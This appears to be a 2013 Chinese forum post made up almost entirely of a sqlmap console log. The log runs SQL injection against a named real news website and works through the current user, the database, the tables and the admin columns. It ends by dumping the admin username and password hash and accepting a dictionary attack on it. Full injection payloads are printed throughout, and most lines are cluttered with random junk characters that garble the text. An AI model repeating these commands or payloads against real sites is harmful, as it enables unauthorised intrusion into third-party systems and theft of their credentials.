D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db' A0 y$ x( h$ d9 `
ms "Mysql" --current-user /* 注解:获取当前用户名称0 {* T) @. z% i: J8 E
sqlmap/0.9 - automatic SQL injection and database takeover tool& s8 S9 t5 ?- y4 A) q% M
http://sqlmap.sourceforge.net starting at: 16:53:54. Q$ z) y1 V5 v0 x, L5 o! w' x$ b, Z
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as, f; j- D. b1 I5 T/ E
session file
: i# d& f+ j2 v- ?[16:53:54] [INFO] resuming injection data from session file
+ f2 y7 o" F9 _' Y7 f# e6 n[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file7 q3 K l& q: `2 [5 `! _
[16:53:54] [INFO] testing connection to the target url
( _3 K/ {4 e$ V: V- hsqlmap identified the following injection points with a total of 0 HTTP(s) reque
Q; k* G0 d- r6 P6 b0 qsts:" G; q- Q% H8 q4 T6 H
---
i6 ?0 I& ]; I+ f) RPlace: GET
3 t) F# e* D' [% }1 a0 \. x0 [Parameter: id1 t$ F9 l6 ]9 x5 o- z
Type: boolean-based blind m; H3 i( }2 B+ E- J
Title: AND boolean-based blind - WHERE or HAVING clause6 C, e- O ?- f0 H- D( J: e5 C' k" n
Payload: id=276 AND 799=799. F4 X* h5 S6 t; b0 x
Type: error-based1 K& W, b7 ?6 c2 f2 n
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
2 l# [) a% D: l4 o Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,! o4 c, ^6 p! Y1 Y, Y4 J
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,583 O$ p+ f2 w0 k4 U
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)6 O3 ~& g/ R% a9 Y- K0 e
Type: UNION query, k& Y1 u, `# i3 K
Title: MySQL UNION query (NULL) - 1 to 10 columns
, k- i2 Z( L7 y& R$ d$ w% A Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
: t, J! i3 p* C1 y(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
* c/ @8 [0 q' ~6 h6 r# [CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
& ]. w" {( R. p7 @& @3 O1 k8 x Type: AND/OR time-based blind
6 `) d. j( }; J3 G Title: MySQL > 5.0.11 AND time-based blind
: M% Q, p. ~1 k% X6 _ Payload: id=276 AND SLEEP(5)5 Y$ A9 T, Y- i: t3 E/ i1 ?* G
---
, ]' m/ S* H& V4 [[16:53:55] [INFO] the back-end DBMS is MySQL m+ x! a! n6 @$ } M5 I* g0 f
web server operating system: Windows9 l. E% ` N4 b4 @9 U
web application technology: Apache 2.2.11, PHP 5.3.0/ H1 b2 y7 ^' R) U: _# i3 a
back-end DBMS: MySQL 5.02 e Q5 O/ A0 r: O2 B3 i7 O6 L
[16:53:55] [INFO] fetching current user' b. j5 ?. Z- ^. C- g8 A* u0 T
current user: 'root@localhost'
& x- h% b y& u9 w/ O[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
/ M* X+ P" v% p5 f' e+ stput\www.wepost.com.hk' shutting down at: 16:53:58: L$ Q/ u4 i5 r A) b
0 L* O+ Y8 K: L$ F& D- k2 N6 t
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db) y6 ]% l$ j2 L
ms "Mysql" --current-db /*当前数据库
. J+ T% Z$ M% V4 o3 p& p% K, V' [ sqlmap/0.9 - automatic SQL injection and database takeover tool
, x( |/ R+ M/ M. L( b n' R7 g. n$ M http://sqlmap.sourceforge.net starting at: 16:54:16
4 j3 j+ v0 X/ b, ~& Y) I. v: Z[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as4 [- L- n& t. }2 ~
session file' G" ?8 W9 Z1 `3 } c. N1 i |
[16:54:16] [INFO] resuming injection data from session file
* U- K, m2 r- e1 m/ ` r5 L4 J[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
! |9 W, u5 N( B[16:54:16] [INFO] testing connection to the target url9 |7 Q% C, U1 q3 H2 K3 L& N0 @( g
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
( C7 n! f2 c7 L, Zsts:
2 @" l" y' M' v. ?* n! P---! f; S, i% ?. W# [ n( V: T
Place: GET5 T$ _0 |* C' _ _9 @) }+ ]7 {+ L
Parameter: id: Q l: l+ ]9 V; X X
Type: boolean-based blind$ L! _$ e5 n2 ]' v; `! P) G
Title: AND boolean-based blind - WHERE or HAVING clause
' V8 Y X' _4 F! l0 i5 c Payload: id=276 AND 799=799
# w2 s1 N- F1 ~3 B. h" @ Type: error-based
1 F" M, Y, |- ` Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- b4 }$ |3 [& ]6 o1 S z; p Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,. F! v+ h2 G& b V8 D) B7 A2 j
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58/ W. v x1 h" i7 r( m" o" w
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)# N6 V! W+ P( I6 B1 M: u
Type: UNION query l7 {, g' f# U$ D! N/ w* B D# ^+ b( X
Title: MySQL UNION query (NULL) - 1 to 10 columns7 B* z# I. x9 Z0 A }; ]% m
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
k; r/ G- O- g/ ^! A/ [ |(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR)," q+ R7 V! }! y# V
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL## q5 ]5 ^* j; C. r- S
Type: AND/OR time-based blind e& \. \% b0 f! o4 T
Title: MySQL > 5.0.11 AND time-based blind
( W5 H; x! b- u) w Payload: id=276 AND SLEEP(5)" J2 L9 A( l4 D4 {+ g0 o
---, `) R: U$ S) t) z g
[16:54:17] [INFO] the back-end DBMS is MySQL
- l0 J* D d1 Iweb server operating system: Windows
" E- U% i: \ l h1 k2 Bweb application technology: Apache 2.2.11, PHP 5.3.0
3 ]" t2 D2 V8 o# \" J8 s/ J" qback-end DBMS: MySQL 5.09 l1 v2 L5 ? h5 G) r. Y
[16:54:17] [INFO] fetching current database$ j0 j! q2 L: G+ q
current database: 'wepost'/ w+ L2 C" p9 d9 E: U8 Z* R! j
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou1 k9 M( U* U7 V9 L
tput\www.wepost.com.hk' shutting down at: 16:54:183 R0 U) @' H& ^9 g0 H0 W
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
6 ]5 x- V0 E" E+ f2 c: U5 dms "Mysql" --tables -D "wepost" /*获取当前数据库的表名 \9 c) W; {8 X0 `+ n( }
sqlmap/0.9 - automatic SQL injection and database takeover tool
4 N8 w: w) O) c2 `3 f3 }0 R0 R% b http://sqlmap.sourceforge.net starting at: 16:55:25. c1 t o/ ]; Y* V+ n4 F
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
+ Y5 i* Z7 t" e! H6 V) X session file3 V3 B. ^2 r9 d$ Z
[16:55:25] [INFO] resuming injection data from session file( }5 h0 J e9 J& i5 ^/ L, u5 i
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
$ J: `1 z. X$ ~9 ^1 V) v$ h/ t3 L[16:55:25] [INFO] testing connection to the target url$ G2 v5 x4 s* i8 ~
sqlmap identified the following injection points with a total of 0 HTTP(s) reque/ J2 m5 a0 o) y& `
sts:
+ L5 o" w# T8 C---
- P9 A$ L+ F% ?' _* [2 WPlace: GET
1 |: I% H0 t, b+ |& @6 VParameter: id
' q/ A' |# `! j! a8 ~ Type: boolean-based blind
9 g$ U$ c/ t/ x2 Z, c Title: AND boolean-based blind - WHERE or HAVING clause- m8 G* F# I$ ^( n; [
Payload: id=276 AND 799=799/ l0 S& v- v- u3 C; r( z) M3 v, T
Type: error-based. N. j4 M. H) u, ?: @1 ?
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause) \9 |" z. W- U' s+ A
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
: d/ B6 G4 s' @ r120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58( _0 L4 p6 ^, S% D6 U
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)6 ^9 D2 y! G2 B T
Type: UNION query
0 W8 A: o, v5 e: Y7 Q9 S8 A Title: MySQL UNION query (NULL) - 1 to 10 columns
5 H% T( i$ Y2 W+ ~( } i Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR9 ?& _8 R+ B @9 a' [( }
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),( L1 W8 U `+ _# c
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#* f0 k/ x- E$ M* K8 @! H: H0 {
Type: AND/OR time-based blind( \7 D! Y' V( z
Title: MySQL > 5.0.11 AND time-based blind' x1 a1 h# l* L' Z* `8 u2 l7 ~
Payload: id=276 AND SLEEP(5)0 {5 V* T1 C% `: U% ?
---1 O7 K, u( O" K6 ~# ^# {
[16:55:26] [INFO] the back-end DBMS is MySQL. x+ r- g2 m6 Y) P) T
web server operating system: Windows9 {/ O: a6 q6 N+ W. u2 G5 N# R- n
web application technology: Apache 2.2.11, PHP 5.3.0
: m8 N) a1 @6 O# _2 g0 Cback-end DBMS: MySQL 5.0" I- I; I; D, w$ F3 `% O
[16:55:26] [INFO] fetching tables for database 'wepost'
2 n/ u7 f" _3 A4 W6 G! J[16:55:27] [INFO] the SQL query used returns 6 entries
( n0 [9 O* m, S6 m8 B- ^, O% d: XDatabase: wepost
7 Z! F0 b2 Z0 h' m/ u/ h3 P z# H6 P[6 tables]# j B' Q! D. p, k1 C; A8 b4 d8 N
+-------------+
/ Y, S& V9 H5 W6 z/ |4 ?| admin | X5 j7 ]5 a! _" ?) T* i) C
| article |1 m( ~+ i' w- |# @
| contributor |
9 q2 s6 U$ i7 {2 _9 ^. z| idea |7 ?- v L5 f! K+ D6 R* z
| image |
* ~7 B# s& A3 y4 y; p3 D| issue |8 r8 W+ K @ N9 h4 b
+-------------+! S+ M$ g& Y0 T4 a- H/ \
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou: X6 q) s6 v6 s( R$ V& h, @" F) P& w
tput\www.wepost.com.hk' shutting down at: 16:55:33' D; N/ J$ @8 H: k/ R" l
' y5 w# |' ]' xD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
) k8 l( E0 F. J' l# P0 ?ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
6 g9 f9 c9 @: B5 ]0 H* `7 V: ` sqlmap/0.9 - automatic SQL injection and database takeover tool/ y- |% }/ l& \. S6 l$ a3 B- f
http://sqlmap.sourceforge.net starting at: 16:56:06/ H% W8 H J$ ]# q6 i$ _1 X" H* T
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
( I! g9 ~) q) `2 [; V5 M. e# \sts:
3 N4 c2 A+ l0 _5 |. G% w7 H. @1 E: b---
1 h5 q( x# g4 j- N; [% R5 MPlace: GET
1 ], n1 B% U/ \- y. L0 |1 o! SParameter: id
3 y/ ]' d; p. z! C9 e Type: boolean-based blind3 Z; V' H% B' Z1 G( C J" [
Title: AND boolean-based blind - WHERE or HAVING clause1 T8 d# @8 {/ \" p
Payload: id=276 AND 799=799, O8 H% | F" N1 C: p' _: _8 O
Type: error-based
7 R% k4 N2 M7 J* Z0 o6 `3 W% j Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
B: v9 N! O9 O5 y) { Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,8 Q1 M: M, |) c$ g8 o$ c
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
0 t! l3 {9 h* `3 {' ~4 S; M),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
" W6 O4 w6 B( Q# ]3 d0 Q# F% M% P Type: UNION query9 z! ?" ~! l4 @9 n
Title: MySQL UNION query (NULL) - 1 to 10 columns3 ]1 s4 D, o* S* U6 w& P# i/ U
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
$ {& P# i5 l c/ j1 `# ?$ V(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
; ?- C# e( p( O' I) `" SCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
7 |) M' H% Z R" R- u Type: AND/OR time-based blind& ?2 o6 [7 Z& c$ |" h X& H' \
Title: MySQL > 5.0.11 AND time-based blind5 }* `9 y- x: Y: `: q
Payload: id=276 AND SLEEP(5)" n% P3 m, p8 J% e* M& \
---
. r. k$ H6 `( o3 A) `web server operating system: Windows% `4 Z! t; ~, w8 G4 @) O" d& t
web application technology: Apache 2.2.11, PHP 5.3.04 ^7 a2 [1 d( }$ Y, @6 d3 U. N) v0 P
back-end DBMS: MySQL 5.0( I3 u, B$ T, l* k6 |2 p
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
, L u0 s5 C7 [+ A0 s4 C& Vssion': wepost, wepost
* Z7 {7 k, E+ I c- DDatabase: wepost, t- a+ O9 c2 n7 W2 F& ?( ]7 x0 J. u- F
Table: admin
* k0 M0 r ~' t O' o9 s( v[4 columns]
8 ?# W! A0 o. z3 | I+----------+-------------+
0 I/ j: L3 ?, I5 U| Column | Type |1 u( M2 h* R& v, E- L
+----------+-------------+. S3 r& }* L1 a) T" k, m
| id | int(11) |
4 _# O# y: x6 `| password | varchar(32) |
! p5 z# Q4 Y$ q* y% L| type | varchar(10) |
, t' u# Y# \* I0 A6 T2 r% g| userid | varchar(20) |
- `) s! n; x3 |4 h2 `+----------+-------------+
# c g3 H) W8 P; |9 s shutting down at: 16:56:19
* b1 i6 k! d6 {3 j5 A- e5 Z
q* I1 b1 {: B7 MD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
7 ]) q: H' G/ l. |& fms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容# w0 `4 W5 P) D" N' e1 m
sqlmap/0.9 - automatic SQL injection and database takeover tool8 h. }, E# b3 F& Q1 C# K4 T
http://sqlmap.sourceforge.net starting at: 16:57:14$ e4 M. ^& f1 x! x H
sqlmap identified the following injection points with a total of 0 HTTP(s) reque3 z1 x( n- S m9 l% v* m$ o
sts:
. W8 m: O) O! y0 C/ E) D---/ e3 E( P! b8 }- A( Y3 t
Place: GET1 E& q% n8 L& H6 |1 X
Parameter: id
2 w/ w4 ]* T5 O5 X0 a Type: boolean-based blind
- `. b' A( J- r- |! C" X/ z Title: AND boolean-based blind - WHERE or HAVING clause, y6 p- |+ ^, R3 ^; ]0 u) K# `
Payload: id=276 AND 799=799& p: \8 B+ g. W& m# C
Type: error-based, D( v" i+ U8 w( {5 ~% P2 r
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause* Z1 ?, s( a8 m* |3 R2 {6 h1 W$ b
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,. k3 C4 \6 N4 I. `' i8 J
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58! P. ^* U2 |/ [
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
9 N+ D3 z! X3 Y* J8 W Type: UNION query4 r! a) A @- u; y: ]9 P7 ?4 Z0 F4 _
Title: MySQL UNION query (NULL) - 1 to 10 columns: T7 Z9 ` `: X2 I: J6 w/ v
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
) i: _7 {7 K; A0 X {( O(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),, V' o- a5 E5 U9 c, {
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
3 E( H/ {1 W! x& i! D- r' z8 d8 I Type: AND/OR time-based blind
6 G$ \6 I( l# Z* h% g+ R! f8 I Title: MySQL > 5.0.11 AND time-based blind
* Z* y( o$ K! `! ~, ?+ b7 F Payload: id=276 AND SLEEP(5)
+ {' z% f8 W1 V6 i---
' q+ z5 {+ L) |- E6 Z4 rweb server operating system: Windows! v1 V8 d6 `2 Z4 v
web application technology: Apache 2.2.11, PHP 5.3.0- A& V/ E1 `+ c( t( D* J
back-end DBMS: MySQL 5.0; g/ o6 ^( c" ^9 Y1 t* ]
recognized possible password hash values. do you want to use dictionary attack o" ^+ K$ {. _0 W4 @* A
n retrieved table items? [Y/n/q] y7 [# R: j2 o' ]+ _5 J! j
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
, z! r' W7 L$ R/ c! V2 }do you want to use common password suffixes? (slow!) [y/N] y' k3 S$ W' c" i' x+ E1 G
Database: wepost
" Y% l+ P4 y7 P* P8 M1 _Table: admin
6 c1 T( z0 W. h$ t0 F& d5 ~- ?[1 entry]
( w# S% v6 z9 U3 i- y+----------------------------------+------------+
8 Z' V2 G3 o/ D| password | userid | {2 H% Y9 L9 y8 m
+----------------------------------+------------+8 t/ F. J* L/ @0 H7 K# W$ [8 ~0 n% q, [
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
! i" i+ @) t/ D( r+----------------------------------+------------+% `+ O$ ~0 P3 M0 [$ e
shutting down at: 16:58:14
, J/ E; E# }( x# |& N+ [8 u4 ]+ m# I6 n3 O3 _' ]( W6 D
D:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对